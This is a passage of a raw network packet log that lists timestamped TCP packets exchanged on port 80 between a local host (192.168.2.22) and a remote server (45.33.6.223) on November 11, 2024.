                                                                                                Nov 11, 2024 10:04:35.136257887 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136293888 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136305094 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136471987 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136475086 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136487961 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136498928 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136511087 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136523962 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136534929 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136552095 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136794090 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136806011 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136816025 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136843920 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136857033 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.136946917 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136957884 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.136967897 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137001038 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137001038 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137119055 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137130022 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137140036 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137162924 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137175083 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137197971 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137208939 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137233019 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137243986 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137249947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137263060 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137267113 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137275934 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137278080 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137290955 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137315035 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137789965 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137803078 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137813091 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137840986 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137850046 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137866020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137878895 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137887955 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.137911081 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.137926102 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.138195992 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138206959 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138216972 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138246059 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.138246059 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.138267040 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138278008 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138298988 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138307095 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.138317108 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138326883 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138338089 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138343096 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.138349056 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.138350964 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.138367891 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.138376951 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.183433056 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.183446884 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.183473110 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.183484077 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.183489084 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.183495045 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.183504105 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.183507919 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.183518887 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.183603048 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217103004 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217125893 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217138052 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217152119 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217159033 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217165947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217170000 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217190981 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217191935 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217199087 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217205048 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217230082 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217235088 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217242002 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217243910 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217268944 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217299938 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217401981 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217437029 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217443943 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217456102 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217489004 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217581034 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217592955 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217605114 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217616081 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217627048 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217642069 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217654943 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217746973 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217762947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217772961 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217783928 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217801094 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.217816114 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217816114 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217825890 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217838049 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.217994928 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218007088 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218015909 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218044043 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218044996 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218053102 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218055964 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218066931 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218080997 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218082905 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218096972 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218102932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218108892 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218113899 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218117952 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218137026 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218148947 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218437910 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218450069 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218460083 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218494892 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218498945 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218504906 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218507051 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218518972 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218529940 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218548059 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218561888 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218592882 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218605042 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218616009 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218626976 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218633890 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218638897 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.218641996 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218664885 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.218677998 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219063044 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219074011 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219085932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219110012 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219202042 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219270945 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219281912 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219293118 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219331980 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219331980 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219412088 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219425917 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219444036 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219453096 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219458103 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219470024 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219476938 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219499111 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219594955 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219605923 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219621897 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219633102 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219644070 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.219645977 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219674110 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.219686031 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222093105 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222141027 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222661972 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222700119 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222711086 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222718954 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222739935 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222770929 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222780943 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222791910 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222821951 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222834110 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222872972 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222882986 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222893953 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222904921 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222917080 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222919941 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222932100 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.222934008 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222942114 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222954035 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.222966909 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223001003 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223017931 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223030090 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223042965 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223043919 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223062038 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223117113 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223118067 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223129988 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223162889 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223176003 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223256111 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223304987 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223356962 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223377943 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223388910 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223398924 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223411083 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223412037 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223419905 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223423958 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223436117 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223442078 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223449945 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223460913 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223479033 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223794937 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223807096 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223824024 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223835945 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.223855019 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.223923922 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264343023 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264355898 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264384031 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264394999 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264406919 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264431953 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264621973 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264636040 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264642000 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264648914 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264738083 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264753103 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.264780998 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264780998 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.264811039 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298209906 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298222065 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298249006 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298260927 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298270941 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298278093 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298286915 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298295021 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298299074 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298312902 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298331976 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298343897 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298353910 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298353910 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298356056 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298369884 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298393011 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298506021 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298517942 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298530102 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298541069 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298546076 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298557043 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298572063 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298574924 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298593044 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298604012 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298608065 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298615932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298628092 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298640013 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298641920 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298652887 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298659086 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298671961 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298683882 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298712969 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298758984 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298852921 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298863888 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298875093 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298906088 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298913002 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298913002 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298918009 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298929930 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298943043 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298943043 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298955917 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.298964977 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.298986912 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299031019 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299050093 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299067020 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299081087 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299081087 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299094915 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299112082 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299133062 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299145937 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299156904 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299170017 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299173117 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299181938 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299205065 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299212933 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299387932 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299398899 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299411058 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299422979 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299432039 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299433947 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299446106 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299453020 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299458027 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299469948 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299474001 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299487114 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299487114 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299499035 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299510956 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299513102 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299520969 CET4916380192.168.2.2245.33.6.223
                                                                                                Nov 11, 2024 10:04:35.299523115 CET804916345.33.6.223192.168.2.22
                                                                                                Nov 11, 2024 10:04:35.299535036 CET804916345.33.6.223192.168.2.22
